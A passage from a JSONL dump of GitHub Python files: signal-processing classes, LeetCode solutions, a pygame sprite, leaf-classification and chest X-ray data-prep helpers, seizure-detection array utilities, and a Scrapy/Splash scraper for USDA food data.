self.get_amp_spectrum(),\r\n self.get_phase_spectrum() - sp_other.get_phase_spectrum(),\r\n **kwargs\r\n )\r\n\r\n @classmethod\r\n def get_spectrum_from_amp_phase(\r\n cls: Type[SP], s1: Relation, s2: Relation, **kwargs\r\n ) -> SP:\r\n \"\"\"Calculate of the spectrum from the amplitude and frequency spectrum.\r\n\r\n The spectrum is calculated through the amplitude and phase spectrum\r\n using the formula abs*exp(1j*phase).\"\"\"\r\n\r\n return cls(s1 * ((1.0j * s2).exp()), **kwargs)\r\n\r\n @classmethod\r\n def convolve(cls: Type[SP], r1: SSPR, r2: SSPR, **kwargs) -> SP:\r\n sp_r1 = _input2spectrum(r1)\r\n sp_r2 = _input2spectrum(r2)\r\n return super().convolve(sp_r1, sp_r2, **kwargs)\r\n\r\n @classmethod\r\n def correlate(cls: Type[SP], r1: SSPR, r2: SSPR, **kwargs) -> SP:\r\n sp_r1 = _input2spectrum(r1)\r\n sp_r2 = _input2spectrum(r2)\r\n return super().correlate(sp_r1, sp_r2, **kwargs)\r\n\r\n def __add__(self: SP, a: SSPRN, **kwargs) -> SP:\r\n r_a = _input2spectrum_operation(a)\r\n return super().__add__(r_a, **kwargs)\r\n\r\n def __sub__(self: SP, a: SSPRN, **kwargs) -> SP:\r\n r_a = _input2spectrum_operation(a)\r\n return super().__sub__(r_a, **kwargs)\r\n\r\n def __mul__(self: SP, a: SSPRN, **kwargs) -> SP:\r\n r_a = _input2spectrum_operation(a)\r\n return super().__mul__(r_a, **kwargs)\r\n\r\n def __truediv__(self: SP, a: SSPRN, **kwargs) -> SP:\r\n r_a = _input2spectrum_operation(a)\r\n return super().__truediv__(r_a, **kwargs)\r\n\r\n def __pow__(self: SP, a: SSPRN, **kwargs) -> SP:\r\n r_a = _input2spectrum_operation(a)\r\n return super().__pow__(r_a, **kwargs)\r\n\r\n\r\ndef _inp2signal_operation(inp: SSPRN) -> Union[\"Relation\", \"Signal\", Num]:\r\n if isinstance(inp, Spectrum):\r\n return inp.get_signal()\r\n elif isinstance(inp, (Signal, Relation, int, complex, float)):\r\n return inp\r\n else:\r\n raise ConvertingError(type(inp), Signal)\r\n\r\n\r\ndef _inp2signal(inp: SSPR) -> \"Signal\":\r\n if isinstance(inp, Spectrum):\r\n return inp.get_signal()\r\n\r\n elif isinstance(inp, Signal):\r\n return inp\r\n\r\n elif isinstance(inp, Relation):\r\n return Signal(inp)\r\n else:\r\n raise ConvertingError(type(inp), Signal)\r\n\r\n\r\nclass Signal(Relation):\r\n \"\"\"Class describing some kind of signal.\r\n\r\n The `Signal` class inherits the `Relation` class.\r\n\r\n **Properties**:\r\n > **time**: `Union[Relation, NDArray]`\r\n An instance of Relation class or inherited from it, or array_like object\r\n containing numbers (real or complex).\r\n\r\n > **amplitude**: `NDArray`\r\n None or array_like object containing numbers (real or complex).\r\n\r\n > **dt**: `float` = `None`\r\n Sample rate of time-axis\r\n\r\n To convert the signal into a spectrum, the method defined in the `Config`\r\n class is used. (Config.signal2spectrum_method). Current method can be\r\n overridden by own in Config class.\r\n\r\n When performing arithmetic operations on instances of the Spectrum class,\r\n an instance of the `Singal` class will be extracted from\r\n the `Spectrum` instance, and arithmetic operations will be performed\r\n on this instance. An instance of `Relation` class will be converted into\r\n the instance of `Signal` class.\r\n\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n time: Union[Relation, np.ndarray],\r\n amplitude: np.ndarray = None,\r\n dt: float = None,\r\n ) -> None:\r\n\r\n self._signal2spectrum_method_default = Config.signal2spectrum_method\r\n super().__init__(time, amplitude, dt)\r\n self._spectrum: Optional[Spectrum] = None\r\n\r\n def get_spectrum(self, recalculate=False, is_start_zero=False) -> \"Spectrum\":\r\n\r\n if self._spectrum is None or recalculate:\r\n f, a = self._signal2spectrum_method_default(*self.get_data(), is_start_zero)\r\n self._spectrum = Spectrum(f, a)\r\n\r\n return self._spectrum\r\n\r\n def get_amplitude_spectrum(\r\n self, recalculate=False, is_start_zero=False\r\n ) -> Relation:\r\n return self.get_spectrum(recalculate, is_start_zero).get_amp_spectrum()\r\n\r\n def get_phase_spectrum(self, recalculate=False, is_start_zero=False) -> Relation:\r\n return self.get_spectrum(recalculate, is_start_zero).get_phase_spectrum()\r\n\r\n def get_reverse_signal(\r\n self: S,\r\n percent: Union[float, int] = 5.0,\r\n subtrack_phase: bool = True,\r\n frequency_start: float = None,\r\n frequency_end: float = None,\r\n **kwargs\r\n ) -> S:\r\n \"\"\"Calculate reversed signal.\r\n\r\n **Properties**:\r\n\r\n > **percent**: `Union[float, int]`\r\n level of added white noise in percent\r\n\r\n > **subtrack_phase**: True\r\n If True performs phase subtraction,\r\n If False succeeds, add the phase.\r\n\r\n > **frequency_start**: float.\r\n Start frequency.\r\n\r\n > **frequency_end**: float\r\n End frequency.\r\n\r\n \"\"\"\r\n signal = (\r\n self.get_spectrum()\r\n .get_reverse_filter(percent, subtrack_phase, frequency_start, frequency_end)\r\n .get_signal()\r\n )\r\n\r\n return type(self)(signal, **kwargs)\r\n\r\n def add_phase(self: S, other: SSPR, **kwargs) -> S:\r\n sp_other = _input2spectrum(other)\r\n self_spectrum = self.get_spectrum()\r\n new_spectrum = Spectrum.get_spectrum_from_amp_phase(\r\n self_spectrum.get_amp_spectrum(),\r\n self_spectrum.get_phase_spectrum() + sp_other.get_phase_spectrum(),\r\n )\r\n return type(self)(new_spectrum.get_signal(), **kwargs)\r\n\r\n def sub_phase(self: S, other: SSPR, **kwargs) -> S:\r\n sp_other = _input2spectrum(other)\r\n self_spectrum = self.get_spectrum()\r\n new_spectrum = Spectrum.get_spectrum_from_amp_phase(\r\n self_spectrum.get_amp_spectrum(),\r\n self_spectrum.get_phase_spectrum() - sp_other.get_phase_spectrum(),\r\n )\r\n return type(self)(new_spectrum.get_signal(), **kwargs)\r\n\r\n @classmethod\r\n def convolve(cls: Type[S], r1: SSPR, r2: SSPR, **kwargs) -> S:\r\n s_r1 = _inp2signal(r1)\r\n s_r2 = _inp2signal(r2)\r\n return cls(super().convolve(s_r1, s_r2), **kwargs)\r\n\r\n @classmethod\r\n def correlate(cls: Type[S], r1: SSPR, r2: SSPR, **kwargs) -> S:\r\n s_r1 = _inp2signal(r1)\r\n s_r2 = _inp2signal(r2)\r\n return cls(super().correlate(s_r1, s_r2), **kwargs)\r\n\r\n def __add__(self: S, a: SSPRN, **kwargs) -> S:\r\n s_a = _inp2signal_operation(a)\r\n return super().__add__(s_a, **kwargs)\r\n\r\n def __sub__(self: S, a: SSPRN, **kwargs) -> S:\r\n s_a = _inp2signal_operation(a)\r\n return super().__sub__(s_a, **kwargs)\r\n\r\n def __mul__(self: S, a: SSPRN, **kwargs) -> S:\r\n s_a = _inp2signal_operation(a)\r\n return super().__mul__(s_a, **kwargs)\r\n\r\n def __truediv__(self: S, a: SSPRN, **kwargs) -> S:\r\n s_a = _inp2signal_operation(a)\r\n return super().__truediv__(s_a, **kwargs)\r\n\r\n def __pow__(self: S, a: SSPRN, **kwargs) -> S:\r\n s_a = _inp2signal_operation(a)\r\n return super().__pow__(s_a, **kwargs)\r\n","repo_name":"Omnivanitate/sweep_design","sub_path":"sweep_design/math_signals/math_signal.py","file_name":"math_signal.py","file_ext":"py","file_size_in_byte":12734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1612844467","text":"class Solution:\n def findMaxConsecutiveOnes(self, nums: List[int]) -> int:\n # # fancy one liner solution as shared by Stefan Pochmann.\n # return max(list(map(len, ''.join(map(str, nums)).split('0') )))\n \n maxlen = l = 0\n\n for num in nums:\n if num == 1:\n l += 1\n maxlen = max(maxlen, l)\n else: \n l = 0\n \n return maxlen","repo_name":"cindyyj/leetcode_solutions","sub_path":"485-max-consecutive-ones/485-max-consecutive-ones.py","file_name":"485-max-consecutive-ones.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73727669587","text":"import pygame\n\nfrom settings import Settings\n\n\nclass Dinosaur:\n def __init__(self, canvas, landscape):\n self.image = pygame.image.load('dinosaur.png')\n self.canvas = canvas\n self.landscape = landscape\n self.rect = self.image.get_rect()\n self.height = self.rect.height\n\n def draw(self):\n self.canvas.blit(self.image, (Settings.centre_x, self.landscape.dinosaur_height - self.height))\n","repo_name":"CompassMentis/dojo_jan2020","sub_path":"dinosaur.py","file_name":"dinosaur.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40448304606","text":"# -*- coding: utf-8 -*-\n# @author: Boi Mai Quach \n################################################\n\n# from pyexpat import features\nimport sys\nfrom sklearn.model_selection import train_test_split\n# Set seed value\nseed_value = 23\nimport os\nos.environ['PYTHONHASHSEED']=str(seed_value)\n# 2. Set `python` built-in pseudo-random generator at a fixed value\nimport random\nrandom.seed(seed_value)\n# 3. Set `numpy` pseudo-random generator at a fixed value\nimport numpy as np\nnp.random.seed(seed_value)\n\nimport pickle\n\nbreakpoints = [1001,1059,\n 1060,1122,\n 1552,1616,\n 1123,1194,\n 1195,1267,\n 1268,1323,\n 1324,1385,\n 1386,1437,\n 1497,1551,\n 1438,1496,\n 2001,2050,\n 2051,2113,\n 2114,2165,\n 2166,2230,\n 2231,2290,\n 2291,2346,\n 2347,2423,\n 2424,2485,\n 2486,2546,\n 2547,2612,\n 2616,2675,\n 3001,3055,\n 3056,3110,\n 3111,3175,\n 3176,3229,\n 3230,3281,\n 3282,3334,\n 3335,3389,\n 3390,3446,\n 3447,3510,\n 3511,3563,\n 3566,3621]\n\nname_classes = [\"pubescent bamboo\", \"Chinese horse chestnut\", \"Anhui Barberry\", \"Chinese redbud\", \"true indigo\",\\\n \"Japanese maple\", \"Nanmu\", \"castor aralia\", \"Chinese cinnamon\", \"goldenrain tree\",\\\n \"Big-fruited Holly\", \"Japanese cheesewood\", \"wintersweet\", \"camphortree\", \"Japan Arrowwood\",\\\n \"sweet osmanthus\", \"deodar\", \"ginkgo-maidenhair tree\", \"Crape myrtle, Crepe myrtle\", \"oleander\",\\\n \"yew plum pine\", \"Japanese Flowering Cherry\", \"Glossy Privet\", \"Chinese Toon\", \"peach\",\\\n \"Ford Woodlotus\", \"trident maple\", \"Beale's barberry\", \"southern magnolia\", \"Canadian poplar\",\\\n \"Chinese tulip tree\", \"tangerine\"]\n\n__features__ = ['image', 'vein', 'xyprojection', 'color', 'texture', 'fourier', 'shape']\n\n__feature_shape__ = {\n\t'image': [300,300,3],\t\n\t'vein': [300,300],\t\n\t'xyprojection': [60,],\n\t'color': [36,],\n\t'texture': [13,],\n\t'fourier': [40,],\n\t'shape': [38,],\n}\n\n__feature_files__ = {\n 'image': \"data/features/images.npy\",\n\t'vein': \"data/features/vein.npy\",\n\t'xyprojection': \"data/features/xyprojection.npy\",\n\t'color': \"data/features/color.npy\",\n\t'texture': \"data/features/texture.npy\",\n\t'fourier': \"data/features/fourier.npy\",\n\t'shape': \"data/features/shape.npy\",\n}\n\n__result_files__ ={\n\t'prediction': \"data/interim/predicted_data.npy\",\n\t'true': \"data/interim/actual_data.npy\",\n\t'false': \"data/interim/false_data.npy\",\n\t'kfold_val_acc': \"data/interim/kfold_val_acc.npy\",\n\t'kfold_test_acc': \"data/interim/kfold_test_acc.npy\",\n}\n\n__visualisation_files__ = {\n\t'result_table': \"reports/kfold_accuracy.csv\", \n\t'confusion_matrix': \"reports/figures/confusion_matrix.png\",\n\t'misclassified_images': \"reports/figures/misclassified_leave_prediction.png\",\n}\n\n\n__label_files__ ={\n\t'labels': \"data/processed/labels/labels.npy\",\n\t'mapping_names': \"data/processed/labels/mapping_names.pkl\"\n} \n\n__normalizing_features__ = ['color', 'texture', 'fourier', 'shape', \"combine\"]\n\n__index_dataset__ = \"data/external/prod_dataset_indexed.csv\"\n\n__index_kfold__ = \"data/external/Dataset_10FoldCV_indexed.csv\"\n\n__model_file__ = \"ENCODER-{}-l2rate{}-dropout{}-fold{}.h5\"\n__prod_encoder_file__ = \"PROD_ENCODER-{}-l2rate{}-dropout{}.h5\"\n\n__models_folder__ = \"models/Dataset_10FoldCV_indexed_models\"\n__prod_encoders_folder__ = \"models/prod_models/encoders\"\n__prod_decoders_folder__ = \"models/prod_models/decoders\"\n\n__encoder_performances_file__ = \"data/interim/Dataset_10FoldCV_indexed_encoders_performances.csv\"\n\n__prod_encoder_performance_file__ = \"data/interim/prod_encoders_performances.csv\"\n\n__best_encoder_file__ = \"data/interim/train_encoders_best.csv\"\n\n__decoder_file__ = \"DECODER-fold{}.pickle\"\n__prod_decoder_file__ = \"PROD_DECODER.pickle\"\n\n__decoder_performances_file__ = \"data/interim/Dataset_10FoldCV_indexed_decoders_performances.csv\"\n\nprod_parameters = {\n \"image\": (0.0001, 0.5),\n \"vein\" : (0.001, 0.5),\n \"xyprojection\": (0.1, 0.5),\n \"color\": (0.01, 0.5),\n \"texture\": (0.01, 0.5),\n \"fourier\": (0.1, 0.5),\n \"shape\": (0.001, 0.5)\n }\n\nnum_folds = 10\n\n\ndef progressBar(value, endvalue, bar_length=20):\n\n \"\"\" Runs the loading bar to observe the process\n \"\"\"\n\n percent = float(value) / endvalue\n arrow = '-' * int(round(percent * bar_length)-1) + '>'\n spaces = ' ' * (bar_length - len(arrow))\n\n sys.stdout.write(\"\\rPercent: [{0}] {1}% {2}/{3} \".format(arrow + spaces, int(round(percent * 100)), value, endvalue))\n sys.stdout.flush()\n\ndef load_features(feature):\n if type(feature) == list:\n return [np.load(__feature_files__[f]) for f in feature]\n return np.load(__feature_files__[feature])\n\ndef load_labels():\n return np.load(__label_files__[\"labels\"])\n\ndef load_mapping_name():\n\twith open(__label_files__[\"mapping_names\"], 'rb') as f:\n\t\tmapping_names = pickle.load(f)\n\treturn mapping_names\n\n\ndef normalize_feature_data(feature, X_train, X_valid, X_test):\n \"\"\"normalize data\n any feature in __normalizing_features__ is normalized, otherwise kept intact\n \"\"\"\n if type(feature) == list:\n for i, f in enumerate(feature):\n \n if f in __normalizing_features__:\n stds = np.std(X_train[i], axis=0)\n stds[stds==0.0] = 1.0\n means = np.mean(X_train[i], axis=0)\n X_train[i] = (X_train[i]-means)/stds\n X_valid[i] = (X_valid[i]-means)/stds\n X_test[i] = (X_test[i]-means)/stds\n else:\n if feature in __normalizing_features__:\n stds = np.std(X_train, axis=0)\n stds[stds==0.0] = 1.0\n means = np.mean(X_train, axis=0)\n X_train = (X_train-means)/stds\n X_valid = (X_valid-means)/stds\n X_test = (X_test-means)/stds\n \n return X_train, X_valid, X_test\n\ndef split_train_test_valid(feature, Kfold, fold, X, y):\n \"\"\"split dataset X, y into train, valid, test sets based on kfold and fold\n \"\"\"\n fold = \"Fold_\" + str(fold)\n \n train_index = Kfold[fold] == \"Train\"\n valid_index = Kfold[fold] == \"Valid\"\n test_index = Kfold[fold] == \"Test\"\n\n if type(feature) == list:\n X_train = [x[train_index] for x in X]\n X_valid = [x[valid_index] for x in X]\n X_test = [x[test_index] for x in X]\n else:\n X_train = X[train_index]\n X_valid = X[valid_index]\n X_test = X[test_index]\n\n ## normalize handcrafted features\n X_train, X_valid, X_test = normalize_feature_data(feature, X_train, X_valid, X_test)\n\n y_train = y[train_index]\n y_valid = y[valid_index]\n y_test = y[test_index]\n\n return (X_train, y_train), (X_valid, y_valid), (X_test, y_test)\n\ndef normalize_arr(arr):\n\tstds = np.std(arr)\n\tif stds == 0.0:\n\t\tstds = 1.0\n\tmeans = np.mean(arr)\n\tnorm_arr = (arr-means)/stds\n\treturn norm_arr\n\ndef normalize_feature(X, features):\n\tif len(features) > 1:\n\t\tfor idx, f in enumerate(features): \n\t\t\tif f in __normalizing_features__:\n\t\t\t\tfeature_arr = X[idx].copy()\n\t\t\t\tnew_feature_arr = []\n\t\t\t\tfor item in feature_arr:\n\t\t\t\t\tnorm_arr = normalize_arr(item)\n\t\t\t\t\tnew_feature_arr.append(norm_arr)\n\t\t\t\ttemp = np.asarray(new_feature_arr)\n\t\t\t\tX[idx] = temp\n\n\telse:\n\t\tif features[0] in __normalizing_features__:\n\t\t\tfeature_arr = X.copy()\n\t\t\tnew_feature_arr = []\n\t\t\tfor item in feature_arr:\n\t\t\t\tnorm_arr = normalize_arr(item)\n\t\t\t\tnew_feature_arr.append(norm_arr)\n\t\t\ttemp = np.asarray(new_feature_arr)\n\t\t\tX = temp\n\t\t\n\treturn X\n\n\n\ndef split_train_test_valid_prod(feature, X, y):\n\tX_train = []\n\tX_test = []\n\tX_valid = []\n\n\tif len(feature) > 1:\n\t\tfor i in range(len(feature)):\n\t\t\ttrain, test, y_train, y_test = train_test_split(X[i], y, test_size=0.2, random_state=seed_value)\n\t\t\ttest, valid, y_test, y_valid = train_test_split(test, y_test, test_size=0.5, random_state=seed_value)\n\t\t\tX_train.append(train)\n\t\t\tX_test.append(test)\n\t\t\tX_valid.append(valid)\n\telse:\n\t\tX_train, X_test, y_train, y_test = train_test_split(X[0], y, test_size=0.2, random_state=seed_value)\n\t\tX_test, X_valid, y_test, y_valid = train_test_split(X_test, y_test, test_size=0.5, random_state=seed_value)\n\n\t## normalize handcrafted features\n\tX_train = normalize_feature(X_train, feature)\n\tX_valid = normalize_feature(X_valid, feature)\n\tX_test = normalize_feature(X_test, feature)\n\t# X_train, X_valid, X_test = normalize_feature_data(feature, X_train, X_valid, X_test)\n\n\treturn (X_train, y_train), (X_valid, y_valid), (X_test, y_test)\n\n\t\n","repo_name":"Tayerquach/Leave_Classfication","sub_path":"src/helper/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7733302011","text":"\"\"\"NIH Chest X-ray dataset, multi-classification pre-processing (train/test split)\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport random\n\ndf = pd.read_csv('/home/nyh/cxr_mc/Data_Entry_2017.csv')\n\nimage_index = df['Image Index']\nfinding_labels = df['Finding Labels']\npd.DataFrame(pd.value_counts(finding_labels)).to_csv('/home/nyh/cxr_mc/stats.csv')\ndisease_list = pd.DataFrame(pd.value_counts([a for a in finding_labels if '|' not in a]))\ndisease_list.to_csv('/home/nyh/cxr_mc/unique_stats.csv')\n\ninput_dir = '/home/nyh/cxr_mc/images/'\noutput_dir = '/home/nyh/cxr_mc/scaled/'\nsave_dir = '/home/nyh/cxr_mc/saved/'\n\ndef proc(disease_name):\n image_list = list(image_index[finding_labels == disease_name])\n image_data = np.zeros((len(image_list), 224, 224, 1), 'uint8')\n for i, fn in enumerate(image_list):\n if i % 100 == 0:\n print(disease_name, '{}/{}'.format(i, len(image_list)), fn)\n image = cv2.imread(input_dir + fn)\n image = cv2.resize(image, (224, 224))\n image_data[i, :, :, 0] = image[:, :, 0]\n\n\n print('saving ...')\n np.save(save_dir + disease_name + '.npy', image_data)\n\n\n# from concurrent.futures import ThreadPoolExecutor\n# with ThreadPoolExecutor(10) as e:\n# for dname in disease_list.index:\n# e.submit(proc, dname)\n\nimport keras.utils\nclass_n = 4\ntrain_x = []\ntrain_y = []\ntest_x = []\ntest_y = []\nval_x = []\nval_y = []\nfor i, dname in enumerate([disease_list.index[i] for i in (0,4,5,6)]):\n print(dname)\n print('reading npy ...')\n image_data = np.load(save_dir + dname + '.npy')\n n_image = image_data.shape[0]\n n_test = (n_image//8)\n n_val = (n_image-n_test)//30\n n_train = n_image - n_test - n_val\n print('train:val:test = {}:{}:{}, val+test={}'.format(n_train, n_val, n_test, n_val+n_test))\n test_x.append(image_data[-(n_test+n_val):])\n test_y.append(keras.utils.to_categorical([i] * (n_test+n_val), class_n))\n val_x.append(image_data[-(n_test+n_val):-n_test])\n val_y.append(keras.utils.to_categorical([i]*n_val, class_n))\n train_x.append(image_data[:n_train])\n train_y.append(keras.utils.to_categorical([i]*n_train, class_n))\n\nprint('concatenating...')\nnp.save(save_dir + 'ub4_0456_train_x.npy', np.concatenate(train_x))\nnp.save(save_dir + 'ub4_0456_train_y.npy', np.concatenate(train_y))\nnp.save(save_dir + 'ub4_0456_val_x.npy', np.concatenate(val_x))\nnp.save(save_dir + 'ub4_0456_val_y.npy', np.concatenate(val_y))\nnp.save(save_dir + 'ub4_0456_test_x.npy', np.concatenate(test_x))\nnp.save(save_dir + 'ub4_0456_test_y.npy', np.concatenate(test_y))\n\n","repo_name":"zzdyyy/Understanding-Adversarial-Attacks-MIA","sub_path":"cxr_mc_proc.py","file_name":"cxr_mc_proc.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"22438111550","text":"class Solution:\n def smallestDistancePair(self, nums, k):\n import bisect\n\n nums.sort()\n l, r = (\n min(nums[i + 1] - nums[i] for i in range(len(nums) - 1)),\n nums[-1] - nums[0],\n )\n while l < r:\n m = (l + r) // 2\n c = sum(\n bisect.bisect_right(nums, nums[i] + m, i + 1) - i - 1\n for i in range(len(nums) - 1)\n )\n if c >= k:\n r = m\n else:\n l = m + 1\n return l\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n print(solution.smallestDistancePair([9, 10, 7, 10, 6, 1, 5, 4, 9, 8], 18))\n","repo_name":"MadSkittles/leetcode","sub_path":"719.py","file_name":"719.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2350646842","text":"# -*- coding: utf-8 -*-\n\n### -------------- IMPORTS -------------- ###\nimport numpy as np\nfrom numba import jit\nfrom scipy import signal\n### ------------------------------------- ###\n\n\ndef chunk_array(start, stop, div):\n \"\"\"\n Get array to read labchart in chunks.\n \n Parameters\n ----------\n start : int\n stop : int\n div : int,\n\n Returns\n -------\n idx : numpy array, 1st col = start, 2nd col = stop\n\n \"\"\"\n\n rem = (stop-start+1) % div\n trim_stop = (stop - rem)\n temp_idx = np.linspace(start, trim_stop, round(trim_stop/div)+1, dtype=int)\n temp_idx = np.append(temp_idx, stop)\n temp_idx = np.unique(temp_idx)\n \n # reshape into 2 column format\n idx = np.zeros((len(temp_idx)-1, 2), dtype=int)\n idx[:, 0] = temp_idx[:-1]\n idx[:, 1] = temp_idx[1:]\n idx[1:, 0] += 1\n return idx\n\n@jit(nopython=True)\ndef find_value(array, value, start=1, order=1):\n \"\"\"\n Find exact value in array.\n \n --- Examples ---\n a = np.array([1.5, 2,.5, 3.5, 5, 15])\n idx = find_value(a, 2, start = 1, order = 1)\n \n Parameters\n ----------\n array : array\n value : int/float, value to be found.\n start = int, starting index\n order : 1, search forwards\n :-1, search reverse\n\n Returns\n -------\n index, array\n \"\"\" \n\n if order == 1:\n for i in range(start, len(array)):\n if array[i] == value:\n return int(i)\n \n elif order == -1:\n for i in range(start, -1, -1):\n if array[i] == value:\n return int(i)\n \n@jit(nopython=True) \ndef remove_zeros(ref_pred, pred_array, bounds):\n \"\"\" \n Replace values with zeros.\n \n Parameters\n ----------\n ref_pred : ndarray, boolean array\n pred_array : ndarray, boolean array\n bounds : list, (elements remove before, after detected seizure)\n\n Returns\n -------\n ref_pred : ndarray (szr_n,2), neighbor threshold\n\n \"\"\"\n # remove neighbours that have zeros\n for i in range(bounds[0], pred_array.shape[0] - bounds[1]):\n if np.sum(pred_array[i-bounds[0]:i+bounds[1]+1]) != np.sum(bounds)+1:\n ref_pred[i] = 0\n return ref_pred\n \n\ndef find_szr_idx(pred_array, dur=0):\n \"\"\"\n find seizure bounds.\n idx_bounds = find_szr_idx(rawpred, np.array([2,2]))\n \n Parameters\n ----------\n pred_array : ndarray, boolean array\n bounds: two element list, denoting neighbours bounds \n \n Returns\n -------\n idx_bounds : NUMPY ARRAY (szr_n,2)\n index bounds for seizures.\n \n \"\"\"\n \n # make a copy of the array\n ref_pred = np.copy(pred_array)\n \n # get min peak distance\n distance = 1\n \n # append 1 to beginning and end\n ref_pred = np.concatenate((np.zeros(1), ref_pred, np.zeros(1)))\n \n # get signal peaks \n idx = signal.find_peaks(ref_pred, height = 1, distance = distance)[0]\n \n # get index bounds\n idx_bounds = np.zeros([len(idx),2], dtype=int)\n \n for i in range(len(idx)):\n idx_bounds[i,0] = find_value(ref_pred, 0, start = idx[i], order = -1) + 1\n idx_bounds[i,1] = find_value(ref_pred, 0, start = idx[i], order = 1) - 1\n \n # remove seizures smaller than dur \n idx_length = idx_bounds[:,1] - idx_bounds[:,0]\n idx_bounds = idx_bounds[idx_length>=dur,:]\n \n # get original index\n idx_bounds = idx_bounds-1\n \n return idx_bounds\n\n\ndef merge_close(bounds, merge_margin = 5):\n \"\"\"\n merge_close(bounds, merge_margin = 5)\n\n Parameters\n ----------\n bounds : 2D ndarray (rows = seizure segments, columns =[start,stop])\n merge_margin : Int, optional\n\n Returns\n -------\n bounds_out : 2D ndarray, merged array (rows = seizure segments, columns =[start,stop])\n\n \"\"\"\n \n if bounds.shape[0] < 2: # if less than two seizures exit\n return bounds\n \n # copy of bounds\n bounds_out = np.copy(bounds) \n\n # find bounds separated by less than merge_margin\n delta = bounds[1:,0] - bounds[:-1,1]\n merge_idx = delta < merge_margin; \n \n # padd with zeros for peak detection\n element = np.zeros(1, dtype=bool)\n merge_idx = np.concatenate((element, merge_idx, element))\n merge_idx = find_szr_idx(merge_idx)\n merge_idx[:, 1] +=1\n merge_idx -= 1 # (-1 for extra addition at 0 element)\n \n # make a copy and leave unchanged, index for original array\n idx = np.copy(merge_idx)\n\n for i in range(merge_idx.shape[0]): # loop though index\n low = merge_idx[i,0]; upper = merge_idx[i,1] # get upper and lower boundaries\n bounds_out[ merge_idx[i,0],:] = [bounds[idx[i,0],0], bounds[idx[i,1],1]] # replace merged \n rmv_idx = np.linspace(low, upper, int(upper-low)+1) # get removal index\n rmv_idx = np.delete(rmv_idx,0).astype(np.int64) # remove first element and convert to int\n bounds_out = np.delete(bounds_out, rmv_idx , axis=0) # delete next element\n merge_idx -= rmv_idx.shape[0] # remove one from index because of deleted element \n \n return bounds_out\n \n\n# find matching seizures \n@jit(nopython=True) \ndef match_szrs(idx_true, idx_pred, err_margin = 5):\n \"\"\"\n match_szrs(idx_true,idx_pred, err_margin)\n\n Parameters\n ----------\n idx_true : Bool, ndarray, User defined (ground truth) boolean index\n idx_pred : Bool, ndarray, Predicted index\n err_margin : int, optional, Default values = 5.\n\n Returns\n -------\n matching : int, number of matching seizures\n\n \"\"\"\n matching = 0 # number of matching seizures\n \n for i in range(idx_true.shape[0]):\n \n # does min bound match within error margin?\n min_bound = np.any(np.abs(np.subtract(idx_true[i,0],idx_pred[:,0])) more than 10 seconds\n sum_continous_segments = np.sum(remove_zeros(pred.copy(),\n pred, bounds))\n \n # pass to index array\n idx[i] = sum_continous_segments\n \n return idx > 0 # convert to logic\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n\n\n","repo_name":"neurosimata/seizy","sub_path":"helper/array_helper.py","file_name":"array_helper.py","file_ext":"py","file_size_in_byte":7340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4911317167","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy_splash import SplashRequest\n\n\n# lua scripts -->\nscript = \"\"\"\n\nfunction main(splash, args)\n assert(splash:go(args.url))\n assert(splash:wait(2))\n splash:set_viewport_full()\n return {\n html = splash:html()\n }\nend\n\n\"\"\"\n\n\npagination_script = \"\"\"\nfunction main(splash, args)\n assert(splash:go(args.url))\n assert(splash:wait(2)) \n assert(splash:runjs('document.querySelector(\".page-number div a:nth-child(' .. splash.args.value .. ')\").click()'))\n assert(splash:wait(1))\n splash:set_viewport_full()\n return {\n html = splash:html()\n }\nend\n\"\"\"\n\n\nclass SpiderScriptSpider(scrapy.Spider):\n\n name = 'spider_script'\n allowed_domains = ['fdc.nal.usda.gov']\n\n def start_requests(self):\n url = 'https://fdc.nal.usda.gov/fdc-app.html#/food-search'\n\n # This is crawled about 9 pages max due to for loop\n for i in range(1, 10):\n yield SplashRequest(url=url, callback=self.parse,\n endpoint='execute',\n cache_args=['lua_source'],\n args={'lua_source': pagination_script, 'value': i},\n headers={'X-My-Header': 'value'},\n dont_filter=True\n )\n\n def parse(self, response):\n description_row = '//tr[@name=\"search-food-result-row\"]'\n url_xpath = './/td[@headers=\"food-Search-result-description-header\"]/a[@class=\"result-description\"]/@href'\n\n for rows in response.xpath(description_row):\n\n published = rows.xpath(\n './/td[@headers=\"Food-Search-result-published-date-header\"]/text()').extract_first()\n url = rows.xpath(url_xpath).extract_first()\n page_url = 'https://fdc.nal.usda.gov/fdc-app.html'+url\n\n yield SplashRequest(url=page_url, callback=self.parse_all_info,\n meta={'published': published},\n endpoint='execute',\n cache_args=['lua_source'],\n args={'lua_source': script},\n headers={'X-My-Header': 'value'},\n dont_filter=True\n )\n\n def getActualData(self, list_data):\n if list_data:\n sent = ''\n for sentence in list_data:\n sent += sentence.strip()\n list_data = sent\n return list_data\n\n def parse_all_info(self, response):\n description_xpath = '//span[@id=\"foodDetailsDescription\"]/h1/text()'\n\n data_type_xpath = '//span[@id=\"foodType\"]/span/following-sibling::text()'\n\n fdc_id_xpath = '//span[@id=\"foodDetailsFdcId\"]/span/following-sibling::text()'\n\n food_code_xpath = '//span[@id=\"surveyFoodCode\"]/span/following-sibling::text()'\n\n food_category_xpath = '//span[contains(text(), \"Food Category:\")]/following-sibling::text()'\n\n description = response.xpath(description_xpath).extract_first()\n dataType = response.xpath(data_type_xpath).extract_first()\n fdcId = response.xpath(fdc_id_xpath).extract()\n foodCode = response.xpath(food_code_xpath).extract_first()\n foodCategory = 